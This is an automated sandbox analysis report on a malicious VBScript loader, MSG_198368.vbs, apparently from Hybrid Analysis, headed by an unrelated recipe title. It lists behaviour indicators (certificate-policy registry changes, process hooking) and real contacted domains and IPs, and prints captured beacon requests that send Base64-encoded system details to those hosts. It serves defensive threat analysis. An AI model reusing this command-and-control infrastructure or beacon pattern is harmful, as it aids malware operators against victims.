Belted Galloway Beef Short Rib Alliums Red Wine and Green Peppercorn Sauce

Incident Response

Risk Assessment

Network Behavior
Contacts 5 domains and 4 hosts.

MITRE ATT&CK™ Techniques Detection

This report has 9 indicators that were mapped to 11 attack techniques and 7 tactics.

Indicators

Not all malicious and suspicious indicators are displayed.

  • External Systems
    • Detected Suricata Alert
      details
      Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
      source
      Suricata Alerts
      relevance
      10/10
    • Sample was identified as malicious by at least one Antivirus engine
      details
      3/58 Antivirus vendors marked sample as malicious (5% detection rate)
      source
      External System
      relevance
      8/10
  • Network Related
    • Malicious artifacts seen in the context of a contacted host
      details
      Found malicious artifacts related to "37.9.175.9": ...
      source
      Network Traffic
      relevance
      10/10
  • Anti-Reverse Engineering
    • Possibly checks for known debuggers/analysis tools
      source
      String
      relevance
      2/10
  • External Systems
    • Found an IP/URL artifact that was identified as malicious by at least one reputation engine
      details
      4/77 reputation engines marked "http://www.kitaair.com" as malicious (5% detection rate)
      2/76 reputation engines marked "http://a.8xcornwall.com" as malicious (2% detection rate)
      2/77 reputation engines marked "http://gdpronline.sk" as malicious (2% detection rate)
      5/76 reputation engines marked "http://kitaair.com" as malicious (6% detection rate)
      7/77 reputation engines marked "http://hotdsk.com" as malicious (9% detection rate)
      source
      External System
      relevance
      10/10
  • Installation/Persistence
    • Executes a visual basic script
      details
      Process "wscript.exe" with commandline ""C:\MSG_198368.vbs""
      source
      Monitored Target
      relevance
      10/10
      ATT&CK ID
      T1064
    • Loads the task scheduler COM API
      details
      "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 73400000
      "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 014A0000
      source
      Loaded Module
      relevance
      5/10
      ATT&CK ID
      T1168
  • Network Related
    • Sends traffic on typical HTTP outbound port, but without HTTP header
      details
      TCP traffic to 173.249.60.219 on port 80 is sent without HTTP header
      TCP traffic to 46.16.91.179 on port 80 is sent without HTTP header
      TCP traffic to 46.16.91.179 on port 443 is sent without HTTP header
      TCP traffic to 37.9.175.9 on port 80 is sent without HTTP header
      source
      Network Traffic
      relevance
      5/10
      ATT&CK ID
      T1043
  • General
    • Accesses Software Policy Settings
      details
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "")
      source
      Registry Access
      relevance
      10/10
      ATT&CK ID
      T1012
    • Accesses System Certificates Settings
      details
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      source
      Registry Access
      relevance
      10/10
      ATT&CK ID
      T1112
    • Contacts domains
      details
      "hotdsk.com"
      "kitaair.com"
      "gdpronline.sk"
      "a.8xcornwall.com"
      "www.kitaair.com"
      source
      Network Traffic
      relevance
      1/10
    • Contacts server
      details
      "173.249.60.219:80"
      "46.16.91.179:80"
      "46.16.91.179:443"
      "37.9.175.9:80"
      source
      Network Traffic
      relevance
      1/10
    • Loads the .NET runtime environment
      details
      "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 6D050000
      source
      Loaded Module
    • Logged script engine calls
      details
      "wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
      "wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
      "wscript.exe" called "WScript.Shell.1.CreateObject" ...
      source
      API Call
      relevance
      10/10
    • Overview of unique CLSIDs touched in registry
      details
      "wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
      "wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
      "wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
      "wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
      "wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
      "wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
      "wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
      "wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
      "wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
      "wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
      "wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
      "wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
      "wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
      "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
      "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
      "wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
      "wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
      "wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
      "wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
      "wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS")
      source
      Registry Access
      relevance
      3/10
  • Installation/Persistence
    • Touches files in the Windows directory
      details
      "wscript.exe" touched file "%WINDIR%\System32\en-US\wscript.exe.mui"
      "wscript.exe" touched file "C:\Windows\System32\rsaenh.dll"
      "wscript.exe" touched file "C:\Windows\System32\wscript.exe"
      "wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
      "wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
      "wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
      "wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
      "wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
      "wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
      source
      API Call
      relevance
      7/10
  • Network Related
    • Found potential URL in binary/memory
      details
      Heuristic match: "hotdsk.com"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: hotdsk.com"
      Heuristic match: "kitaair.com"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: kitaair.com"
      Heuristic match: "gdpronline.sk"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: gdpronline.sk"
      Heuristic match: "a.8xcornwall.com"
      Pattern match: "www.kitaair.com"
      source
      String
      relevance
      10/10
    • HTTP request contains Base64 encoded artifacts
      details
      "Microsoft Windows 7 Professional "
      source
      Network Traffic
      relevance
      7/10
      ATT&CK ID
      T1132
  • Spyware/Information Retrieval
    • Found a reference to a known community page
      details
      "'mischaracterization middens loud-mouthed berry-shaped arthritics chromatoid twitteration Bluffton Garrison erratic cadgy baselevel coinfers befan unwhiglike Whiteboy siliquiferous Bolshevikian buds sickbeds caroused unroutinely hutched meshes cacophonical pseudoexperimentally untruth procrastinative jargonized mischances McConnell circumneutral kauries ticklishly headmistressship trendier pokeroots grapeskin cointerest Geryon humorousnesses Dolichosauri semiprotective carbuilder dithyrambs whale-gig play-by-play anestrous paren squarer lacings bassara palletizing xanthuria eighty-fourth Synentognathi amniorrhea wilkeite quarter-run ambassadors sleepiest meteorograph adonize reddendum chloralide zinco- cocreate twice-permitted Vookles gainly unanimities Bononian Ultra-tory shinner Tencteri kinked pentadrachm Briseus diatribes rain-streaked udaller dispelling exequy shevel psychologism deep-grounded Blackman irrecoverableness westernism Moresby spotlight Topsy Lenapes tormentress bauckiebird bedspreads Nors" (Indicator: "twitter")
      source
      String
      relevance
      7/10
  • System Security
    • Creates or modifies windows services
      details
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
      source
      Registry Access
      relevance
      10/10
      ATT&CK ID
      T1112
    • Modifies Software Policy Settings
      details
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS")
      source
      Registry Access
      relevance
      10/10
      ATT&CK ID
      T1112
  • Unusual Characteristics
    • Installs hooks/patches the running process
      details
      "wscript.exe" wrote bytes "e739f676e1a6fa762e71fa76ee29fa7685e2f5766da0fa769064f9763ad5007726e4f576d16dfa76003df876804bf87600000000ad378b758b2d8b75b6418b7500000000" to virtual address "0x74811000" (part of module "WSHIP6.DLL")
      "wscript.exe" wrote bytes "fae6f576e1a6fa762e71fa76ee29fa7685e2f5766da0fa7626e4f576d16dfa76003df876804bf87600000000ad378b758b2d8b75b6418b7500000000" to virtual address "0x742E1000" (part of module "WSHTCPIP.DLL")
      "wscript.exe" wrote bytes "c04ef8762054f976e065f976b538fa760000000000d0607500000000c5ea60750000000088ea607500000000e968e8748228fa76ee29fa7600000000d269e874000000007dbb60750000000009bee87400000000ba18607500000000" to virtual address "0x77191000" (part of module "NSI.DLL")
      "wscript.exe" wrote bytes "41fa1307" to virtual address "0x6DBF1FFC" (part of module "MSCORWKS.DLL")
      source
      Hook Detection
      relevance
      10/10
      ATT&CK ID
      T1179

File Details

All Details:

MSG_198368.vbs

Filename
MSG_198368.vbs
Size
941KiB (963769 bytes)
Type
script vbs
Description
ASCII text, with very long lines
Architecture
WINDOWS
SHA256
22f240cc77ced030b4f2f2987c0f00805d89ffbe6310cb7e59c8023bbc78cade

Hybrid Analysis

Analysed 1 process in total.

  • wscript.exe "C:\MSG_198368.vbs" (PID: 1828)

Network Analysis

DNS Requests

HTTP Traffic

Suricata Alerts

ET rules applied using Suricata (Proofpoint ET Intelligence).

Extracted Files

No significant files were extracted.

Notifications

  • Although all strings were processed, some are hidden from the report in order to reduce the overall size
  • Enforcing malicious verdict, as a reliable source indicates high confidence
  • Not all sources for indicator ID "api-55" are available in the report
  • Not all sources for indicator ID "api-64" are available in the report
  • Not all sources for indicator ID "registry-17" are available in the report
  • Not all sources for indicator ID "registry-18" are available in the report
  • Not all sources for indicator ID "registry-19" are available in the report
  • Not all sources for indicator ID "registry-72" are available in the report
  • Sample was not shared with the community
    Source: https://www.hybrid-analysis.com/sample/22f240cc77ced030b4f2f2987c0f00805d89ffbe6310cb7e59c8023bbc78cade?environmentId=100
